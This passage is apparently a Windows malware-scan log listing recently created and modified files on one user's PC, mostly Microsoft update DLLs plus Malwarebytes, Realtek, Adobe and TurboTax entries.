    2017-01-10 22:58 - 2016-12-13 23:22 - 02998272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
    2017-01-10 22:58 - 2016-12-13 23:22 - 02748416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpcore.dll
    2017-01-10 22:57 - 2016-12-21 00:59 - 00218976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offlinesam.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 03892864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 01852720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 01360464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 01277344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 01201872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 00980832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll
    2017-01-10 22:57 - 2016-12-20 23:41 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll
    2017-01-10 22:57 - 2016-12-20 23:39 - 01300480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
    2017-01-10 22:57 - 2016-12-20 23:35 - 04612608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
    2017-01-10 22:57 - 2016-12-20 23:35 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\indexeddbserver.dll
    2017-01-10 22:57 - 2016-12-20 23:33 - 19413504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
    2017-01-10 22:57 - 2016-12-20 23:32 - 19417600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
    2017-01-10 22:57 - 2016-12-20 23:27 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
    2017-01-10 22:57 - 2016-12-20 23:26 - 01155072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVP9DEC.dll
    2017-01-10 22:57 - 2016-12-20 23:25 - 06474752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe
    2017-01-10 22:57 - 2016-12-20 23:24 - 06044160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
    2017-01-10 22:57 - 2016-12-20 23:24 - 05061120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
    2017-01-10 22:57 - 2016-12-20 23:24 - 03733504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
    2017-01-10 22:57 - 2016-12-20 23:24 - 00886272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
    2017-01-10 22:57 - 2016-12-14 00:21 - 02206496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msmpeg2vdec.dll
    2017-01-10 22:57 - 2016-12-14 00:01 - 00382784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AUDIOKSE.dll
    2017-01-10 22:57 - 2016-12-14 00:01 - 00076984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\remoteaudioendpoint.dll
    2017-01-10 22:57 - 2016-12-13 23:46 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
    2017-01-10 22:57 - 2016-12-13 23:40 - 00231424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
    2017-01-10 22:57 - 2016-12-13 23:40 - 00104448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.UI.Logon.ProxyStub.dll
    2017-01-10 22:57 - 2016-12-13 23:38 - 13869056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
    2017-01-10 22:57 - 2016-12-13 23:38 - 00213504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.CredDialogController.dll
    2017-01-10 22:57 - 2016-12-13 23:35 - 00755712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
    2017-01-10 22:57 - 2016-12-13 23:32 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3D12.dll
    2017-01-10 22:57 - 2016-12-13 23:32 - 00497152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LogonController.dll
    2017-01-10 22:57 - 2016-11-02 07:01 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
    2017-01-10 22:57 - 2016-08-01 23:30 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
    2017-01-10 22:48 - 2016-12-21 02:49 - 00328008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll
    2017-01-10 22:47 - 2016-12-21 03:08 - 00136032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ImplatSetup.dll
    2017-01-10 22:47 - 2016-12-21 03:04 - 07816032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
    2017-01-10 22:47 - 2016-12-21 02:43 - 04130440 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
    2017-01-10 22:47 - 2016-12-21 02:43 - 01454504 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetsrc.dll
    2017-01-10 22:47 - 2016-12-21 02:43 - 01071736 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll
    2017-01-10 22:47 - 2016-12-21 02:43 - 00092512 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
    2017-01-10 22:47 - 2016-12-21 02:42 - 22224480 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
    2017-01-10 22:47 - 2016-12-21 02:42 - 01988560 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
    2017-01-10 22:47 - 2016-12-21 02:42 - 01702392 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfasfsrcsnk.dll
    2017-01-10 22:47 - 2016-12-21 02:42 - 01300600 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
    2017-01-10 22:47 - 2016-12-21 02:41 - 01600632 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
    2017-01-10 22:47 - 2016-12-21 02:14 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
    2017-01-10 22:47 - 2016-12-21 02:13 - 00119808 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCsp.dll
    2017-01-10 22:47 - 2016-12-21 02:12 - 00083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProvPluginEng.dll
    2017-01-10 22:47 - 2016-12-21 02:10 - 00234496 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCore.dll
    2017-01-10 22:47 - 2016-12-21 02:09 - 00368640 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneBackupHandler.dll
    2017-01-10 22:47 - 2016-12-21 02:09 - 00363520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BioFeedback.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 01292288 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BlockedShutdown.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpencom.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00349184 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00289792 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeveloperOptionsSettingsHandlers.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
    2017-01-10 22:47 - 2016-12-21 02:07 - 00748544 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
    2017-01-10 22:47 - 2016-12-21 02:06 - 06285312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
    2017-01-10 22:47 - 2016-12-21 02:06 - 00310784 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncSettings.dll
    2017-01-10 22:47 - 2016-12-21 02:06 - 00260608 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
    2017-01-10 22:47 - 2016-12-21 02:06 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
    2017-01-10 22:47 - 2016-12-21 02:05 - 00425984 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
    2017-01-10 22:47 - 2016-12-21 02:05 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
    2017-01-10 22:47 - 2016-12-21 02:01 - 09131008 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
    2017-01-10 22:47 - 2016-12-21 01:59 - 01908224 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
    2017-01-10 22:47 - 2016-12-21 01:56 - 00947712 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVP9DEC.dll
    2017-01-10 22:47 - 2016-12-21 01:56 - 00936960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
    2017-01-10 22:47 - 2016-12-21 01:55 - 08129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
    2017-01-10 22:47 - 2016-12-21 01:55 - 04749312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
    2017-01-10 22:47 - 2016-12-21 01:53 - 06664192 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe
    2017-01-10 22:47 - 2016-12-21 01:51 - 08075776 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
    2017-01-10 22:47 - 2016-12-21 01:49 - 04149248 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
    2017-01-10 22:47 - 2016-12-21 01:49 - 02691072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
    2017-01-10 22:47 - 2016-12-21 01:49 - 01062912 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
    2017-01-10 22:47 - 2016-12-21 01:47 - 01121280 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
    2017-01-10 22:47 - 2016-12-14 00:34 - 02482280 _____ (Microsoft Corporation) C:\WINDOWS\system32\msmpeg2vdec.dll
    2017-01-10 22:47 - 2016-12-14 00:23 - 00404832 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
    2017-01-10 22:47 - 2016-12-14 00:19 - 00584544 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
    2017-01-10 22:47 - 2016-12-14 00:17 - 00319288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64.dll
    2017-01-10 22:47 - 2016-12-14 00:14 - 01694712 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
    2017-01-10 22:47 - 2016-12-13 23:46 - 00206848 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
    2017-01-10 22:47 - 2016-12-13 23:43 - 00201728 _____ (Microsoft Corporation) C:\WINDOWS\system32\ScDeviceEnum.dll
    2017-01-10 22:47 - 2016-12-13 23:42 - 00352768 _____ (Microsoft Corporation) C:\WINDOWS\system32\cloudAP.dll
    2017-01-10 22:47 - 2016-12-13 23:42 - 00236544 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSCard.dll
    2017-01-10 22:47 - 2016-12-13 23:40 - 00193536 _____ (Microsoft Corporation) C:\WINDOWS\system32\certprop.dll
    2017-01-10 22:47 - 2016-12-13 23:39 - 00837632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
    2017-01-10 22:47 - 2016-12-13 23:39 - 00290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
    2017-01-10 22:47 - 2016-12-13 23:37 - 00090112 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
    2017-01-10 22:47 - 2016-12-13 23:36 - 01002496 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
    2017-01-10 22:47 - 2016-12-13 23:36 - 00539648 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
    2017-01-10 22:47 - 2016-12-13 23:26 - 00932864 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
    2017-01-10 22:47 - 2016-12-13 23:26 - 00869888 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
    2017-01-10 22:47 - 2016-12-13 23:25 - 02009600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRHInproc.dll
    2017-01-10 22:47 - 2016-12-13 23:24 - 00673792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
    2017-01-10 22:47 - 2016-12-13 23:23 - 03134976 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcore.dll
    2017-01-10 22:47 - 2016-12-13 23:22 - 02317824 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
    2017-01-10 22:47 - 2016-12-13 23:22 - 01513472 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
    2017-01-10 22:47 - 2016-12-13 23:22 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
    2017-01-10 22:47 - 2016-12-13 23:21 - 03616768 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
    2017-01-10 22:46 - 2016-12-21 03:08 - 00245600 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinesam.dll
    2017-01-10 22:46 - 2016-12-21 02:46 - 00624048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
    2017-01-10 22:46 - 2016-12-21 02:42 - 00241504 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
    2017-01-10 22:46 - 2016-12-21 02:15 - 22563840 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
    2017-01-10 22:46 - 2016-12-21 02:05 - 00261632 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
    2017-01-10 22:46 - 2016-12-21 02:00 - 00440320 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhcfg.dll
    2017-01-10 22:46 - 2016-12-21 01:59 - 00883712 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
    2017-01-10 22:46 - 2016-12-21 01:58 - 23678464 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
    2017-01-10 22:46 - 2016-12-21 01:57 - 00462336 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhsettingsprovider.dll
    2017-01-10 22:46 - 2016-12-21 01:53 - 04474368 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
    2017-01-10 22:46 - 2016-12-21 01:51 - 05611008 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
    2017-01-10 22:46 - 2016-12-21 01:50 - 01490432 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
    2017-01-10 22:46 - 2016-12-13 23:48 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
    2017-01-10 22:46 - 2016-12-13 23:42 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.UI.Logon.ProxyStub.dll
    2017-01-10 22:46 - 2016-12-13 23:41 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
    2017-01-10 22:46 - 2016-12-13 23:40 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
    2017-01-10 22:46 - 2016-12-13 23:40 - 00266752 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConsoleLogon.dll
    2017-01-10 22:46 - 2016-12-13 23:39 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.CredDialogController.dll
    2017-01-10 22:46 - 2016-12-13 23:38 - 17188864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
    2017-01-10 22:46 - 2016-12-13 23:35 - 00600576 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptui.dll
    2017-01-10 22:46 - 2016-12-13 23:24 - 01005568 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3D12.dll
    2017-01-10 22:46 - 2016-12-13 23:23 - 01231872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
    2017-01-10 22:46 - 2016-12-13 23:22 - 00707584 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
    2017-01-10 22:45 - 2016-12-21 02:37 - 00455520 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
    2017-01-10 22:45 - 2016-12-21 01:54 - 05511680 _____ (Microsoft Corporation) C:\WINDOWS\system32\aclui.dll
    2017-01-10 22:45 - 2016-12-21 01:53 - 01692672 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
    2017-01-10 22:45 - 2016-12-21 01:51 - 02275840 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
    2017-01-10 22:45 - 2016-12-14 00:41 - 01235296 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
    2017-01-10 22:45 - 2016-12-14 00:41 - 00590960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
    2017-01-10 22:45 - 2016-12-14 00:33 - 01356864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipUp.exe
    2017-01-10 22:45 - 2016-12-14 00:18 - 00715104 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys
    2017-01-10 22:45 - 2016-12-14 00:18 - 00335712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
    2017-01-10 22:45 - 2016-12-14 00:14 - 00418952 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
    2017-01-10 22:45 - 2016-12-14 00:14 - 00089416 _____ (Microsoft Corporation) C:\WINDOWS\system32\remoteaudioendpoint.dll
    2017-01-10 22:45 - 2016-12-13 23:38 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
    2017-01-10 22:45 - 2016-11-02 06:00 - 00534096 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
    2017-01-10 22:45 - 2016-11-02 05:28 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll
    2017-01-10 22:45 - 2016-11-02 05:22 - 00337920 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
    2017-01-10 22:45 - 2016-11-02 05:21 - 00942080 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
    2017-01-10 17:38 - 2017-02-01 18:26 - 00176064 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMChameleon.sys
    2017-01-10 17:37 - 2017-02-01 21:20 - 00110536 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
    2017-01-10 17:37 - 2017-02-01 21:20 - 00091584 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
    2017-01-10 17:37 - 2017-01-31 23:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
    2017-01-10 17:37 - 2017-01-20 07:47 - 00077416 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
    2017-01-10 17:37 - 2017-01-10 17:37 - 00001919 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
    2017-01-10 17:37 - 2017-01-10 17:37 - 00000000 ____D C:\Program Files\Malwarebytes
    2017-01-10 08:16 - 2017-01-31 15:36 - 00000000 ____D C:\Users\Joseph\Desktop\Marina
    2017-01-08 19:56 - 2017-01-31 20:39 - 00000000 ___RD C:\Users\Joseph\Creative Cloud Files
    2017-01-08 19:53 - 2017-01-08 19:53 - 00000000 ____D C:\Users\Joseph\AppData\Local\CEF
    2017-01-08 19:49 - 2017-01-08 19:49 - 00804440 _____ (Adobe Systems Incorporated) C:\Users\Joseph\Downloads\CreativeCloudSet-Up (1).exe
    2017-01-06 16:13 - 2017-01-06 16:13 - 00000000 ____D C:\Program Files\Common Files\Intel
    2017-01-06 16:13 - 2017-01-06 16:13 - 00000000 ____D C:\Program Files (x86)\Cisco
    2017-01-04 16:04 - 2017-01-04 16:04 - 00313276 _____ C:\Users\Joseph\Downloads\reciept2.pdf
    2017-01-04 16:04 - 2017-01-04 16:04 - 00273789 _____ C:\Users\Joseph\Downloads\reciept1.pdf
    2017-01-03 19:19 - 2017-01-24 21:11 - 00000000 ____D C:\Users\Joseph\Desktop\Joe
    2017-01-02 16:12 - 2017-02-01 20:58 - 00093053 _____ C:\Users\Joseph\Desktop\Annual Budget - 2017.xlsx
    2017-01-02 16:12 - 2017-01-31 23:03 - 00087912 _____ C:\Users\Joseph\Desktop\A79BE330

    ==================== One Month Modified files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2017-02-01 21:29 - 2016-09-23 17:44 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Skype
    2017-02-01 21:25 - 2016-07-16 01:04 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
    2017-02-01 21:19 - 2016-09-22 19:47 - 00043968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
    2017-02-01 21:18 - 2016-09-29 09:24 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
    2017-02-01 21:18 - 2016-09-29 08:58 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
    2017-02-01 21:18 - 2016-09-22 19:48 - 00251848 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
    2017-02-01 21:18 - 2016-09-22 19:41 - 00000000 __SHD C:\Users\Joseph\IntelGraphicsProfiles
    2017-02-01 21:17 - 2016-09-29 09:03 - 00000000 ____D C:\Users\Joseph
    2017-02-01 21:17 - 2016-07-16 01:04 - 00524288 _____ C:\WINDOWS\system32\config\BBI
    2017-02-01 20:56 - 2016-09-29 08:55 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
    2017-02-01 19:33 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\NDF
    2017-02-01 17:43 - 2016-07-16 06:47 - 00000000 ___HD C:\Program Files\WindowsApps
    2017-02-01 17:43 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\AppReadiness
    2017-02-01 17:17 - 2016-09-29 09:03 - 01320142 _____ C:\WINDOWS\system32\PerfStringBackup.INI
    2017-02-01 08:53 - 2016-10-29 21:04 - 00000000 ____D C:\Users\Joseph\AppData\Local\Adobe
    2017-02-01 08:45 - 2016-07-16 06:45 - 00000000 ____D C:\WINDOWS\INF
    2017-01-31 23:31 - 2016-10-18 20:11 - 00000000 ____D C:\Users\Joseph\AppData\Local\ElevatedDiagnostics
    2017-01-31 23:05 - 2016-09-23 11:59 - 00000368 _____ C:\WINDOWS\Tasks\HPCeeScheduleForJoseph.job
    2017-01-31 21:05 - 2016-09-29 09:23 - 00003264 _____ C:\WINDOWS\System32\Tasks\HPCeeScheduleForJoseph
    2017-01-31 20:50 - 2016-10-09 20:00 - 00000000 ____D C:\Program Files (x86)\ShopTracker
    2017-01-31 20:39 - 2016-10-29 21:14 - 00000000 ____D C:\ProgramData\boost_interprocess
    2017-01-30 21:00 - 2016-10-09 20:01 - 00000000 ____D C:\Users\Joseph\AmazonMeter
    2017-01-28 18:25 - 2016-10-01 10:34 - 00000000 ____D C:\Users\Joseph\Desktop\Bank School
    2017-01-25 00:38 - 2016-07-16 06:36 - 00000000 ____D C:\WINDOWS\CbsTemp
    2017-01-21 21:06 - 2016-09-29 08:55 - 00357720 _____ C:\WINDOWS\system32\FNTCACHE.DAT
    2017-01-21 20:43 - 2015-10-30 01:28 - 00000000 ____D C:\Users\Default.migrated
    2017-01-21 09:20 - 2016-09-23 17:44 - 00000000 ____D C:\ProgramData\Skype
    2017-01-20 18:50 - 2016-12-15 07:50 - 00003292 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
    2017-01-20 18:49 - 2016-09-22 19:45 - 00002377 _____ C:\Users\Joseph\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
    2017-01-20 18:49 - 2016-09-22 19:45 - 00000000 ___RD C:\Users\Joseph\OneDrive
    2017-01-19 18:39 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\ELAMBKUP
    2017-01-18 22:54 - 2016-09-28 12:54 - 00000000 ____D C:\Users\Joseph\Documents\UserTesting
    2017-01-18 22:27 - 2016-09-22 20:21 - 00000000 ____D C:\Users\Joseph\AppData\Local\UserTestingPlugin
    2017-01-15 15:52 - 2016-11-09 10:50 - 00000000 ____D C:\Users\Joseph\Documents\TurboTax
    2017-01-15 15:45 - 2016-11-09 10:48 - 00000479 _____ C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
    2017-01-15 15:30 - 2016-11-09 10:49 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Intuit
    2017-01-15 15:30 - 2016-11-09 10:46 - 00000000 ____D C:\Program Files (x86)\TurboTax
    2017-01-15 14:07 - 2016-07-16 06:47 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
    2017-01-15 14:05 - 2016-04-01 13:57 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
    2017-01-13 19:46 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\LiveKernelReports
    2017-01-13 15:56 - 2016-09-29 08:59 - 00168695 _____ C:\WINDOWS\system32\Drivers\rtkhdasetting.zip
    2017-01-13 15:56 - 2016-09-29 08:59 - 00002081 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\B&O Play Audio Control.lnk
    2017-01-13 15:56 - 2016-09-29 08:59 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
    2017-01-13 15:56 - 2016-08-06 13:49 - 00000000 ___HD C:\Program Files (x86)\Temp
    2017-01-13 15:53 - 2016-08-06 13:49 - 05523456 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\Drivers\RTKVHD64.sys
    2017-01-13 15:53 - 2016-08-06 13:49 - 03503048 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkApi64.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 03201376 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RltkAPO64.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 02995000 _____ (DTS, Inc.) C:\WINDOWS\system32\slcnt64.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 02839520 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\RtlExUpd.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 00192976 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkCfg64.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 00023688 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkCoLDR64.dll
    2017-01-13 15:53 - 2016-04-01 13:31 - 00000000 ____D C:\SWSetup
    2017-01-12 11:14 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\rescache
    2017-01-11 00:22 - 2015-11-02 13:02 - 00000000 __RHD C:\Users\Public\AccountPictures
    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\oobe
    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\ShellExperiences
    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\Provisioning
    2017-01-10 23:28 - 2016-09-23 16:25 - 00000000 ____D C:\WINDOWS\system32\MRT
    2017-01-10 23:25 - 2016-09-23 16:25 - 135657872 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
    2017-01-10 17:37 - 2016-09-22 19:47 - 00000000 ____D C:\ProgramData\Malwarebytes
    2017-01-08 21:19 - 2016-09-22 19:41 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Adobe
    2017-01-08 20:09 - 2016-10-29 21:27 - 00000000 ____D C:\Program Files\Adobe
    2017-01-08 20:02 - 2016-10-29 21:33 - 00000000 ____D C:\ProgramData\regid.1986-12.com.adobe
    2017-01-08 19:54 - 2016-10-29 21:14 - 00000000 __RHD C:\Users\Joseph\[email protected] Creative Cloud Files
    2017-01-08 19:52 - 2016-10-29 21:10 - 00001309 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk
